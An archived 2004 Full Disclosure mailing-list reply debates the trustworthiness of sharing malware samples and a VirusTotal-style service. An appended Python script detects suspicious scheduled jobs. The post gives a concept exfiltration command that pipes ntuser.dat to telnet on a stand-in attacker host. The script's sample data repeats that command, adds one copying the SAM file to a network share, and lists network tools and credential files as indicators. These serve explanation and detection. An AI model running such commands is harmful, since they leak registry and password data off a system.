Full Disclosure mailing list archives
Re: win2kup2date.exe ?
From: James Tucker <jftucker () gmail com>
Date: Fri, 3 Sep 2004 13:46:31 +0100
On Fri, 3 Sep 2004 04:05:02 -0700 (PDT), Harlan Carvey <keydet89 () yahoo com> wrote:
> James, I'm replying off-list for the simple fact that I can't believe the post you sent to FD. Your questions back to Nick are...well, what's the right word???...it's as if you're not even paying attention.

Apologies, I will try to explain myself. I am sending this back to the list, as it is obvious that my meaning was not clear, and there may be some points to be learned by others also. Thank you for pointing this out to me.

> > > > ... If you want to email me a copy of it, I'll rip it apart and see what can be seen.
>
> > > And world plus dog should entrust you with such material because???
>
> > ... most viruses, trojans and malware do not store copies of stolen data in their executables. Furthermore the file size is very small.
>
> Interesting answer, but completely non sequitur. Nick asked why this person should be trusted with a live bit of malware, and your response is that it's not very big??? What does that have to do with anything?

Malware and viruses are VERY readily available in many places across the internet. Therefore this point should be of no concern. The only other concern which may be important is the possibility that the binary is carrying data from the infected system; it was this that I was referring to. Please accept my apology for not making this clearer.

> > > > P.S. Send it to [...] - it's my "catch all" for virus/unknown files. Just be sure to ZIP it up or else the web host won't let it through. Otherwise I have disabled all checks/scan. Downloads directly to a secured Linux box.
>
> > > That's all very nice, but alone, far from the makings of someone to entrust arbitrary, suspected malware samples to.
>
> > "Entrust", just what exactly are you thinking you might be giving away?
>
> Well, it's pretty obvious...a live bit of malware. It's really pretty obvious what Nick's getting at...why send this malware to some arbitrary person? Who's to say that he's going to use it as he says, and not send it back out to someone else?

To what end? It would be much more useful to an attacker to go and collect and customise one of the many readily available trojans on the internet, rather than spreading malware which they have no control over. IMHO your concern is closer to cynicism than practical reality.

> > Again, you suspect a lot of deception here, and while it is of course possible you are correct, I have yet to see this ever done in practice.
>
> You haven't seen deception in practice...in general, or specifically in the case of VirusTotal?

If the virus was carrying data from the local system, and some hackers had set up a fake site of the VirusTotal sort, this would be a sophisticated way of deceiving "security pros" into passing out details. It would be easily possible to carry all of their password hashes, for example; if any of them run VPNs this would be a near instant release of access passwords (an army of several hundred zombies could decode all the LM hashes in minutes).

> > Samples of non-data carrying viruses or trojans are of little use to anyone other than Anti-Virus firms, as it is easy to collect raw source for most if one is so inclined.
>
> Really? Are you able to do so? I would submit that many with malicious intent don't know the sites and sources you seem to be aware of, and will actually ask for the binary...for the purpose of releasing it against someone else. Non-data carrying or otherwise, it doesn't matter. I received several IMs just this weekend in which I was asked for running viruses.

Well, the same lack of trust may be given to you. In order to find a balance between proving my point and not providing you with up to date info, I will provide you with this (http://vx.netlux.org/) site as an example, which is not carrying any modern sources at this time. You can find these easily by trawling security sites of high standards; they have outbound links to such sites. Google is rarely your friend in this regard, which may be why you are not aware of the high numeracy of such sites on the internet. Needless to say that this lack of awareness is possibly a good thing for most people (read: reduces script-kiddie access to such data).

> > I agree that it is unlikely they have sufficient client licenses to provide such a service; however I can see that there are a great deal of arguments in law about how their case may be won.
>
> If a product is used in a manner for which it is not sufficiently or correctly licensed, how can one then use the law to win their case? After all, it wouldn't be "their" (ie, VirusTotal's) case...it would be a case brought against them by the vendor.

I am not a lawyer, but I have seen cases won due to lack of definition of a license. In this case the argument I gave is not contradicted by any of the licenses involved as far as I can see. As I said though, I am not a lawyer.

> > They may for example only be required to carry one license; they could argue that they are simply allowing users to deliberately infect their systems, and making portions of the logs publicly available.
>
> That doesn't make any sense at all...if they are required to carry only one license, then their copy of the product would be sufficiently licensed, and any case brought against them would be over before it started.

My point exactly; until the case is brought into a court room it is probably one of the lesser defined scenarios under current interpretation of law.

> > If there are viruses which commonly copy target system data, or sensitive data, into their binaries at the present time (I imagine the mention of this deception may well spring at least one such virus) then I apologise that I am not aware of it.
>
> Does it matter exactly what the malicious code does?

In this case the deception could be very serious, as capturing the password details of a security professional is arguably more "interesting" and might (possibly) be more valuable to an attacker. This would be a good deceptive method of doing so. As to whether generically it matters what a virus does, no; of course if a virus is defined as being such, it is malicious and should be removed anyway. Sometimes it is important to know its functionality, as what if it had secretly run a command like: at 18:30 "echo ntuser.dat | telnet haxorsite.com:1337" The antivirus program would remove the virus, but your registry data would still get sent to the hacker site as this data is not illegal in the system. Before anyone has a go at me over access to ntuser.dat / timing issues / whatever, this is a concept example only; use your heads please.

> > There is always no need for aggressive statement of suspicion, which you are close to here. While I understand aggression due to anger, I am concerned that one should not get angry at someone offering them a service merely because one is suspicious of them. What if the offer of help is entirely genuine?
>
> I think that you're entirely missing the point, as I've already pointed out.

I apologise that this message of mine was not as clear as it should have been. Thank you for pointing it out to me.

_______________________________________________
Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
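The scheduled-job scenario in the message above (a job that keeps sending data after the antivirus has removed the binary) is the kind of thing an incident responder checks for by auditing the scheduler rather than only the files on disk. The following is an added example, not code from the thread: it parses a constructed, hypothetical `at` job listing and flags commands that pipe or redirect data into a network client or touch sensitive files. The `at` output layout, the indicator lists and the 10.0.0.5 share are assumptions for illustration.

```python
import re

# Constructed sample of an `at` job listing on a Windows 2000 host (hypothetical, not captured output).
SAMPLE_AT_OUTPUT = """\
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Each M T W Th F S Su    6:30 PM       cmd /c "echo ntuser.dat | telnet haxorsite.com 1337"
        2   Each M T W Th F         2:00 AM       C:\\WINNT\\system32\\defrag.exe C:
        3   Today                   11:45 PM      cmd /c "type C:\\WINNT\\repair\\sam > \\\\10.0.0.5\\share\\sam.txt"
"""

# Assumed indicators: network client tools and files that typically hold credentials or registry data.
NETWORK_TOOLS = ("telnet", "nc", "ncat", "ftp", "tftp")
SENSITIVE_PATHS = ("ntuser.dat", "repair\\sam", "\\config\\sam", "\\config\\security")

JOB_LINE = re.compile(r"^\s*(?:ERROR\s+)?(\d+)\s+(.+?)\s{2,}(\d{1,2}:\d{2} [AP]M)\s+(.+)$")


def parse_at_jobs(text):
    """Turn an `at` listing into a list of {id, schedule, time, command}; header lines are skipped."""
    jobs = []
    for line in text.splitlines():
        m = JOB_LINE.match(line)
        if m:
            jobs.append({"id": int(m.group(1)), "schedule": m.group(2).strip(),
                         "time": m.group(3), "command": m.group(4).strip()})
    return jobs


def suspicious_jobs(jobs):
    """Return (job id, reasons) for jobs whose command line looks like data leaving the host."""
    flagged = []
    for job in jobs:
        cmd = job["command"].lower()
        tokens = re.findall(r"[a-z0-9_.]+", cmd)
        reasons = []
        if any(t in NETWORK_TOOLS for t in tokens) and ("|" in cmd or ">" in cmd):
            reasons.append("data piped into network client")
        if re.search(r"\\\\[\w.]+\\", cmd):
            reasons.append("output redirected to a UNC path")
        if any(p in cmd for p in SENSITIVE_PATHS):
            reasons.append("references sensitive file")
        if reasons:
            flagged.append((job["id"], reasons))
    return flagged


if __name__ == "__main__":
    for job_id, reasons in suspicious_jobs(parse_at_jobs(SAMPLE_AT_OUTPUT)):
        print(f"job {job_id}: {', '.join(reasons)}")
```

Run against a real listing, the same two functions work on the output of `at` (or a `schtasks` export once its columns are mapped), and the flagged job ids are what to delete and preserve for analysis.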